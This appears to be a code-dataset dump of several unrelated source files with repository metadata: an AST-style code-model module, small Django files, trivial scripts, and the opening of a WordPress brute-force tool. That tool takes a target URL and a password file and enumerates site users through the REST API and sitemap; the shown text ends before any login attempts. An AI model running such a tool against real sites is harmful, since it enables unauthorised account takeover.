CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). """ def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. """ CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. """ def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. """ def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. """ CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. `while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def __len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
[]
felipe-menelau/todo-list-web
api/views/todo_views.py
9b60a549dc6d5bdd88e1a584b8bb2c4f56131cb5
from django.contrib.auth.models import User from rest_framework import viewsets, status from rest_framework.response import Response from rest_framework.permissions import IsAuthenticated, IsAdminUser from api.serializers import TODOListSerializer from api.models import TODOList class TODOListViewSet(viewsets.ModelViewSet): permission_classes = [IsAuthenticated] serializer_class = TODOListSerializer def get_queryset(self): user = self.request.user return TODOList.objects.filter(owner=self.request.user).order_by('created_at') def create(self, request, *args, **kwargs): request.data['owner'] = request.user.id return super(self.__class__, self).create(request, *args, **kwargs)
[((16, 15, 16, 63), 'api.models.TODOList.objects.filter', 'TODOList.objects.filter', (), '', False, 'from api.models import TODOList\n')]
techkey/PTVS
Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py
8355e67eedd8e915ca49bd38a2f36172696fd903
# ProgramB.py print('Hello World')
[]
effective-altruism-australia/donation-portal
donation/migrations/0043_auto_20180109_0012.py
45fe58edc44d0c4444b493e4ac025fc53897c799
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion def copy_existing_referrals_into_new_field(apps, schema_editor): Pledge = apps.get_model('donation', 'Pledge') Referral = apps.get_model('donation', 'Referral') reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct() for reason in reasons: if reason: # Filter out None and u'' Referral.objects.create(reason=reason) for pledge in Pledge.objects.all(): reason = pledge.how_did_you_hear_about_us if reason: pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason) pledge.save() class Migration(migrations.Migration): dependencies = [ ('donation', '0042_amend_donation_view'), ] operations = [ migrations.CreateModel( name='Referral', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('reason', models.CharField(max_length=256)), ], ), migrations.AddField( model_name='pledge', name='how_did_you_hear_about_us_db', field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True), ), migrations.RunPython(copy_existing_referrals_into_new_field) ]
[((42, 8, 42, 68), 'django.db.migrations.RunPython', 'migrations.RunPython', ({(42, 29, 42, 67): 'copy_existing_referrals_into_new_field'}, {}), '(copy_existing_referrals_into_new_field)', False, 'from django.db import migrations, models\n'), ((40, 18, 40, 170), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((33, 23, 33, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((34, 27, 34, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')]
c1m50c/twitter-examples
python/is_even.py
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
def is_even(i: int) -> bool: if i == 1: return False elif i == 2: return True elif i == 3: return False elif i == 4: return True elif i == 5: ... # Never do that! Use one of these instead... is_even = lambda i : i % 2 == 0 is_even = lambda i : not i & 1 is_odd = lambda i : not is_even(i)
[]
RandomRobbieBF/wordpress-bf
wordpress-brute.py
fe78d4367b7baaf18a4200c5c040595d37b4100f
#!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} 